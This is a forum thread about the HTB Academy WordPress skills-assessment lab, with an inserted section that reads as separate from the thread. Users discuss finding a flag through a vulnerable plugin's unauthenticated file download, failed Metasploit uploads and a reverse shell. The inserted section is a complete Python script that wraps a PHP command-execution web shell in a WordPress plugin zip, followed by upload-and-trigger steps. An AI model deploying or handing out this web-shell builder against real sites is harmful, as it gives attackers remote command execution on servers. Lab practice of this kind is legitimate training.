HTB Academy - Hacking WordPress, Skills Assessment

Hi,

I’ve got a problem with one task in Hacking WordPress - Skills Assessment.

I got everything but “Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.”.

Do you have any tips on which file includes a flag, because I can’t get it? I have actually obtained a reverse shell.

Hint LFI:
You can find the solution in the topic “Exploiting a Vulnerable Plugin”. Also, you can manually check all plugins on Exploit-DB.

My Shell Problem:
I have some problems with the shell. I have the password and login, and it works. But I can’t upload the shell with Metasploit; I get the following message:

[+] Authenticated with WordPress
[*] Preparing payload…
[*] Uploading payload…
[*] Executing the payload at /wp-content/plugins/pWwazjprXa/obGHIQqZmr.php…
[!] This exploit may require manual cleanup of ‘obGHIQqZmr.php’ on the target
[!] This exploit may require manual cleanup of ‘pWwazjprXa.php’ on the target
[!] This exploit may require manual cleanup of ‘…/pWwazjprXa’ on the target
[*] Exploit completed, but no session was created.

or

[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.

Do you also use msf? Maybe you have a hint?

Solved: I uploaded the shell manually…

regards
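The manual route the poster settled on, shown as an added example that is not code from the thread or from HTB: WordPress’s plugin uploader only accepts a zip whose top-level directory holds a .php file carrying a plugin header comment, and after installation that file is served from /wp-content/plugins/<dir>/<file>.php, the same layout the Metasploit output above shows. The script below builds such an archive in pure Python. The directory and file names, the PHP body and the target URL are all placeholders chosen for the example.

```python
"""Build a minimal WordPress plugin archive around a PHP file.

Added example, not from the original thread. Assumptions: the slug and
file names are random placeholders, DEFAULT_PHP is a stand-in body, and
the base URL passed to plugin_file_url() is whatever the target is.
"""
import io
import random
import string
import zipfile

# Stand-in body appended below the plugin header (assumption: the reader
# substitutes whatever they intend to upload).
DEFAULT_PHP = "if (isset($_GET['cmd'])) { system($_GET['cmd']); }\n"


def random_slug(length=10):
    """Random letters-only name, in the style of the pWwazjprXa/obGHIQqZmr
    names in the Metasploit output above."""
    return "".join(random.choice(string.ascii_letters) for _ in range(length))


def plugin_header(name, version="1.0"):
    """The header comment WordPress parses to recognise a file as a plugin.
    'Plugin Name' is the only field it actually requires."""
    return (
        "<?php\n"
        "/*\n"
        f"Plugin Name: {name}\n"
        f"Version: {version}\n"
        "*/\n"
    )


def build_plugin_zip(slug, php_name, php_body=DEFAULT_PHP):
    """Return zip bytes laid out as <slug>/<php_name>.php.

    The header is prepended so the uploader accepts the archive as a plugin;
    the body that follows runs when the file is requested directly."""
    source = plugin_header(slug) + php_body
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{php_name}.php", source)
    return buf.getvalue()


def archive_entries(zip_bytes):
    """Paths inside the archive, to verify the layout before uploading."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def read_entry(zip_bytes, path):
    """Contents of one archive member, decoded as text."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(path).decode()


def plugin_file_url(base_url, slug, php_name):
    """Where the file is reachable once WordPress has unpacked the plugin."""
    return f"{base_url.rstrip('/')}/wp-content/plugins/{slug}/{php_name}.php"


if __name__ == "__main__":
    slug, php_name = random_slug(), random_slug()
    data = build_plugin_zip(slug, php_name)
    with open(f"{slug}.zip", "wb") as fh:
        fh.write(data)
    print(f"wrote {slug}.zip ({len(data)} bytes); after upload, request:")
    # Placeholder host; substitute the target.
    print(plugin_file_url("http://wordpress.local", slug, php_name))
```

Upload the resulting zip through Plugins > Add New > Upload Plugin with the admin credentials already in hand, then request the printed URL. If the upload is rejected, check that the archive really contains a directory with the header file (archive_entries() shows this) rather than a bare .php at the top level.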

@DufterTyp said:

Hint LFI:
You can find the solution in the topic “Exploiting a Vulnerable Plugin”. Also, you can manually check all plugins on Exploit-DB.

I was able to find and use LFI, but how do I know which file contains the flag?

You should search for “unauthenticated file download”, not LFI, for this question…
Check all plugins again on Exploit-DB…

I can’t find the answer to the question:

“Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.”

Things I’ve done:

  • Solved all other questions. Found the 2 other flags.
  • Got a reverse shell.
  • Searched the whole filesystem for other flag files. Nothing.
  • Grep searched the whole filesystem for files containing ‘HTB’. Nothing.
  • Manually went through the /plugins/ folder hoping to find the file that contains the flag. Nothing.

Can anyone point me in the right direction? What does the question need?
Thanks!

The report you generate has vulnerabilities. Check them all. Shouldn’t take long.